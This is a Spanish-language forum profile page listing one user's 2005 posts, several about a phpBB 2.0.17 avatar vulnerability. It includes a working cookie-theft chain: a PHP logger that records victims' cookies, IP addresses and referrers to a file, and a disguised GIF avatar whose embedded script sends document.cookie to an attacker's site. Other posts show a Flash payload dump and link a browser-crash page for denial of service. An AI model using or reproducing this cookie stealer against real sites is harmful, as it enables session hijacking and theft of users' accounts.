últimos mensajes de: mousehack

Mostrar Mensajes
Páginas: 1 [2] 3 4 5

11	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 11 Noviembre 2005, 02:33 am
Cita de: manware en 10 Noviembre 2005, 04:26 am Antes de crear el LOG fijense si funciona un simple ALERT para probar si la vulnerabilidad realmente funciona. Teniendo en cuenta que en realidad se trata de una omision de IE es posible que quienes visiten el post con el exploit tengan en su explorador el parche adecuado... Al menos eso creo... Yo aún no he visto que ese exploit funcione... podriamos probar poniendo la supuesta imagen en hexa, a ver si funciona (yo no tengo foro en q probar... ) por ejemplo: la cabecera del gif: Código: 47 49 46 38 39 61 01 00 01 00 y un simple alert: Código: <HTML><HEAD><SCRIPT>alert(document.cookie);</SCRIPT></HEAD></HTML> en hexa: Código: 47 49 46 38 39 61 01 00 01 00 3C 48 54 4D 4C 3E 3C 48 45 41 44 3E 3C 53 43 52 49 50 54 3E 61 6C 65 72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 3B 3C 2F 53 43 52 49 50 54 3E 3C 2F 48 45 41 44 3E 3C 2F 48 54 4D 4C 3E en este caso probamos como cabecera del GIF Código: GIF89a_--. para probar (unicamente con IE, con firefox no funciona) http://planet.nana.co.il/mycoolpictures123/fake/lt2.jpg PD:adapatacion de un texto de K-Gen Salu2

Media / Diseño Gráfico / Que debo modificar para que funcione...????Bug-macromedia

en: 10 Noviembre 2005, 20:12 pm

este archivo flash:

Código:

<swf>

----- [SetBackgroundColor] -----
TagID: 9 (size: 3 (short tag)
- dump ->:
\x43\x02\xff\x00\x00

----- [DoAction] -----
TagID: 12 (size: 60 (short tag)
- dump ->:
\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00
\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43
\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45
\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00

----- [ShowFrame] -----
TagID: 1 (size: 0 (short tag)
- dump ->:
\x40\x00

----- [End] -----
TagID: 0 (size: 0 (short tag)
- dump ->:
\x00\x00

</swf>

que debo modificar para que funcione???? no tengo mucha idea de esto $:-\$

Salu2

13	Informática / Tutoriales - Documentación / Re: Manual-Todo sobre los Troyanos	en: 8 Noviembre 2005, 21:32 pm
repitiendo el post de tu web...Muy buen trabajo y bien explicado Salu2

14	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 8 Noviembre 2005, 01:54 am
http://foro.elhacker.net/index.php/topic,89986.0.html Salu2

15	Seguridad Informática / Bugs y Exploits / Re: probando un bucle infinito...	en: 5 Noviembre 2005, 15:10 pm
Cita de: kasswed en 5 Noviembre 2005, 00:18 am Está bien Mousehack, parece que a ti lo del C & P se te da muy bien, el-brujo tiene que crear una sección que se llame Copy & Paste, y te ponga a ti de moderador. Saludos! Sin comentarios...no vale la pena contestar... Citar Una cosa, y este 'bug' ¿qué utilidad tiene? Se puede dejar colgada una máquina, pero si la máquina no va a la URL no hay nada. Y remotamente no lo puedes hacer. Así que no le veo mucha importancia a este 'bug'. remotamente no puedes hacer un DOS en una maquina???...no comment ahora aclaro algo...en ningun momento dije que el codigo a probar era mio, simplemente que lo probe y se colgo mi browser...por lo demas no vale la pena!!! Salu2

16	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 4 Noviembre 2005, 18:24 pm
no tiene que salir ninguna imagen!!! es un gif modificado y el codigo, en principio, crea un archivo ¨log.txt¨ en tu server con las cookies salu2

17	Seguridad Informática / Bugs y Exploits / Re: probando un bucle infinito...	en: 4 Noviembre 2005, 15:51 pm
asi es... Salu2

18	Seguridad Informática / Bugs y Exploits / probando un bucle infinito...	en: 3 Noviembre 2005, 21:56 pm
me decidi a probar un bucle infinito en mi PC con IE SP2 y Firefox 1.0.7 y quisiera que me dieran su opinion al respecto... para probarlo en vuestro browser hacer click en: http://ha.ckers.org/imagecrash.html Salu2

19	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 3 Noviembre 2005, 19:41 pm
por ejemplo hagamos algo asi para realizar un robo de cookie... creamos un archivo llamado cookie.php con el siguiente codigo: Código: <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('log.txt'); // chmod 777 and same directory fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' '); fclose($fp); ?> este codigo creara un archivo log.txt con permiso 777 ahora creamos un avatar para subir a la web vulnerable con el siguiente codigo: Código: <GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html> y lo guardamos, recordando ponerle la extension .GIF Salu2

20	Foros Generales / Foro Libre / Re: Sus escritorios	en: 29 Octubre 2005, 04:20 am
estos son mis buscadores... XDDD...

Páginas: 1 [2] 3 4 5